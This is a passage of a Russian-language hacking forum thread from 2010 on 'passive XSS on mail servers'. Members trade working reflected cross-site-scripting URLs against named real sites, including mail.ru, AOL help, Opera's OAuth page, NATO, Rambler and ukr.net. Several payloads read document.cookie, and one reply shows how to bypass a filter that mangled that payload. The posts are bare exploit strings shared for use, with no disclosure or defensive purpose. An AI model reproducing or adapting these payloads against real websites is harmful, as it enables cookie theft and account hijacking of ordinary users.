FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Пассивные xss на почтовых серверах

Страница 15 из 25

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

19.10.2010, 22:48

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

Цитата:

Сообщение от satana666

satana666 said:
Пасcивка на mail.ru

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//starlook.lady.mail.ru/commented?">alert('XSS')[/COLOR][/COLOR]

Вот только в alert(document.cookie) точка заменяется на _
Это можно как-нибудь обойти?

так будет лучше.

Код HTML:

HTML:
http://starlook.lady.mail.ru/commented?period=month">alert(document.cookie)

Зря выложил ее, завтра уже будет закрыта.

23.10.2010, 23:19

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

Код HTML:

HTML:
http://help.aol.com/help/microsites/searchEntry.do?&searchString=">alert(document.cookie)

04.11.2010, 17:24

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

Код:

Code:
http://auth.opera.com/service/oauth/authorize?oauth_token=RTMG0hYfEyPQcAltkyZIdmAXHaJyTf9X">alert(document.cookie)

14.11.2010, 01:13

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

хотья это не почтовик, но думаю модеры простят меня

http://www.nato.int/cps/en/natolive/search.htm

">alert('ololo')

PR-9

тИЦ- 1100

15.11.2010, 19:45

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

Код:

Code:
http://maps.google.com/maps?ll=55.354135,40.297852&spn=42.876902,89.560547&z=4&layer=t&hl=ru

уязвимо поле - Задайте местоположение по умолчанию

поймай меня

16.11.2010, 14:25

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

снова lady.mail.ru , такой тут еще не было вроде

Код:

Code:
http://lady.mail.ru/product/?letter=1alert(123)

17.11.2010, 16:50

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

kids.rambler.ru

Код:

Code:
http://kids.rambler.ru/faq/271063/tns-counter.ru?p=1alert('~d0s~')

19.11.2010, 16:25

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

tv.ukr.net

Код:

Code:
http://tv.ukr.net/?scn=tv&sb=1'>alert(1)

Там почти весь сайт,видимо хсс они за багу не считают

21.11.2010, 01:52

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

rabota.ngs.ru

Код:

Code:
http://rabota.ngs.ru/vacancies/search/?other2=yes&rubrics%5B%5D=1">alert(1)

#10

22.11.2010, 17:07

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

autorambler.ru

Код:

Code:
http://autorambler.ru/bz/pdd/pddonline/?type=1//-->alert(123)

Страница 15 из 25

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Веб-уязвимости	43	12.01.2021 19:31
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ